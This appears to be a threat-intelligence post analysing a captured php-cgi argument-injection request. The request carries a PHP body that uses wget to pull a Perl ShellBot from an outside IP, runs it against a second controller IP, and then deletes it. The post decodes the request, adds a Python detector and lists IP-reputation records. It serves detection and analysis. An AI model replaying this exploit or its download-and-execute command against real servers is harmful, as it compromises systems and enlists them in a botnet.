BEGIN OF HTTP DATA:
2015-07-24 13:15:21
Source IP: 128.41.128.44
Country: GB RiskScore: 7.1 Malware: []
POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: 195.169.125.87
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Content-Type: application/x-www-form-urlencoded
Content-Length: 204
<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("wget 194.60.242.251/minispeedtest/speedtest/.z/hb/plk03 -O /tmp/.0e1bc.log;perl /tmp/.0e1bc.log 188.165.44.137;rm -rf /tmp/.0e1bc.log;"); ?>
END OF DATA
The decoded URL looks like:
/phppath/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-n
php-cgi takes this query string as command-line options: the -d overrides switch off the interpreter's restrictions, and auto_prepend_file=php://input makes it execute the POST body as PHP, so the body's system() call runs on the server. The actual downloadable is a Perl-based ShellBot.
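As an added example for this post (not the blog's own tooling), the following Python script applies the decoding above to raw requests and turns it into a detection: it treats a query string with no literal "=" whose decoded first token begins with "-" as php-cgi argument injection, lists the -d overrides that touch a dangerous php.ini setting, and, when auto_prepend_file=php://input is present, mines the POST body for IPv4 indicators and downloader commands. It generalises beyond this capture to any -d override. The directive list, the regular expressions and the function names are my assumptions; the sample request is the captured one above, reconstructed with the wrapped query string joined back into one line.

```python
"""Detector for php-cgi argument injection in raw HTTP requests.
Added example for this post (not the blog's own tooling); the directive
list, regexes and sample request below are constructed here."""
import re
from urllib.parse import unquote

# php.ini settings that, forced through "-d", either disarm the interpreter's
# restrictions or make it execute attacker-controlled input as code.
# (Assumed list; extend as needed.)
DANGEROUS_DIRECTIVES = {
    "allow_url_include", "auto_prepend_file", "auto_append_file",
    "disable_functions", "open_basedir", "safe_mode", "suhosin.simulation",
}
REQUEST_LINE_RE = re.compile(r"^([A-Z]+) (\S+) HTTP/\d\.\d$")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOWNLOADER_RE = re.compile(r"\b(?:wget|curl|fetch|lwp-download)\b")


def decode_argv(raw_query):
    """Return the argv php-cgi would receive for this query string, or []
    for an ordinary query. php-cgi only treats the query as command-line
    options when it contains no literal '=', which is why the captured
    request encodes every '=' as %3D; '+' separates the options."""
    if not raw_query or "=" in raw_query:
        return []
    argv = [unquote(tok) for tok in raw_query.split("+") if tok]
    return argv if argv and argv[0].startswith("-") else []


def dangerous_directives(argv):
    """Collect the '-d name=value' overrides that touch a dangerous setting."""
    hits = []
    for i, tok in enumerate(argv[:-1]):
        if tok == "-d":
            name = argv[i + 1].split("=", 1)[0]
            if name in DANGEROUS_DIRECTIVES:
                hits.append(argv[i + 1])
    return hits


def analyse_request(raw):
    """raw: request line, headers, blank line, body (CRLF or LF line ends).
    Returns a verdict dict, or None if the request line does not parse."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    m = REQUEST_LINE_RE.match(head.split("\n", 1)[0])
    if not m:
        return None
    method, target = m.groups()
    path, _, query = target.partition("?")
    argv = decode_argv(query)
    hits = dangerous_directives(argv)
    # auto_prepend_file=php://input makes the interpreter run the POST body
    # as PHP before the requested script, so the body is the real payload.
    body_is_payload = method == "POST" and any(
        h.startswith("auto_prepend_file=php://input") for h in hits)
    return {
        "method": method,
        "path": unquote(path),
        "argv": argv,
        "argv_injection": bool(argv),
        "dangerous_directives": hits,
        "body_is_payload": body_is_payload,
        # Indicators worth pivoting on: every IPv4 literal in the payload
        # and whether it pulls a second stage with a downloader.
        "body_ips": sorted(set(IPV4_RE.findall(body))) if body_is_payload else [],
        "downloader_in_body": bool(DOWNLOADER_RE.search(body)) if body_is_payload else False,
    }


# The captured request from the post, reconstructed (query string joined
# back into one line; the body is the PHP payload as posted).
SAMPLE_REQUEST = "\r\n".join([
    "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F"
    "%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66"
    "+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64"
    "+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65"
    "%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70"
    "%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1",
    "Host: 195.169.125.87",
    "User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "Content-Type: application/x-www-form-urlencoded",
    "Content-Length: 204",
    "",
    r'<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("wget '
    r"194.60.242.251/minispeedtest/speedtest/.z/hb/plk03 -O /tmp/.0e1bc.log;"
    r'perl /tmp/.0e1bc.log 188.165.44.137;rm -rf /tmp/.0e1bc.log;"); ?>',
])

if __name__ == "__main__":
    import json
    print(json.dumps(analyse_request(SAMPLE_REQUEST), indent=2))
```

Run against the sample, the verdict flags argv injection with six dangerous overrides, marks the body as the payload, and returns the two addresses the post lists as indicators; an ordinary request such as GET /index.php?page=1 produces no hits because its query contains a literal "=". Keying the check on the decoded first token rather than on a fixed string keeps it working when the attacker changes the order or spelling of the options.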
- 188.165.44.137: the address the downloaded script is told to connect to (passed to it within the command)
{
  "categoryDescriptions": {},
  "cats": {},
  "geo": {
    "country": "France",
    "countrycode": "FR"
  },
  "ip": "188.165.44.137",
  "reason": "Regional Internet Registry",
  "reasonDescription": "One of the five RIRs announced a (new) location mapping of the IP.",
  "score": 1,
  "subnets": [
    {
      "categoryDescriptions": {},
      "cats": {},
      "created": "2012-03-22T07:26:00.000Z",
      "geo": {
        "country": "France",
        "countrycode": "FR"
      },
      "ip": "188.165.0.0",
      "reason": "Regional Internet Registry",
      "reasonDescription": "One of the five RIRs announced a (new) location mapping of the IP.",
      "score": 1,
      "subnet": "188.165.0.0/16"
    }
  ]
}

- 194.60.242.251: the download URL
{
  "categoryDescriptions": {
    "Scanning IPs": "These IPs have been identified as illegally scanning networks for vulnerabilities."
  },
  "cats": {
    "Scanning IPs": 14
  },
  "geo": {
    "country": "Ukraine",
    "countrycode": "UA"
  },
  "ip": "194.60.242.251",
  "reason": "Firewall deny log analysis",
  "reasonDescription": "This IP was involved in port scanning activities.",
  "score": 1.4,
  "subnets": [
    {
      "categoryDescriptions": {},
      "cats": {},
      "created": "2012-03-22T07:26:00.000Z",
      "geo": {
        "country": "Ukraine",
        "countrycode": "UA"
      },
      "ip": "194.60.242.0",
      "reason": "Regional Internet Registry",
      "reasonDescription": "One of the five RIRs announced a (new) location mapping of the IP.",
      "score": 1,
      "subnet": "194.60.242.0/24"
    }
  ]
}

- 194.24.228.203: the IP hardcoded in the bot
{
  "categoryDescriptions": {},
  "cats": {},
  "geo": {
    "country": "France",
    "countrycode": "FR"
  },
  "ip": "194.24.228.203",
  "reason": "Regional Internet Registry",
  "reasonDescription": "One of the five RIRs announced a (new) location mapping of the IP.",
  "score": 1,
  "subnets": [
    {
      "categoryDescriptions": {},
      "cats": {},
      "created": "2012-03-22T07:26:00.000Z",
      "geo": {
        "country": "France",
        "countrycode": "FR"
      },
      "ip": "194.24.228.0",
      "reason": "Regional Internet Registry",
      "reasonDescription": "One of the five RIRs announced a (new) location mapping of the IP.",
      "score": 1,
      "subnet": "194.24.228.0/23"
    }
  ]
}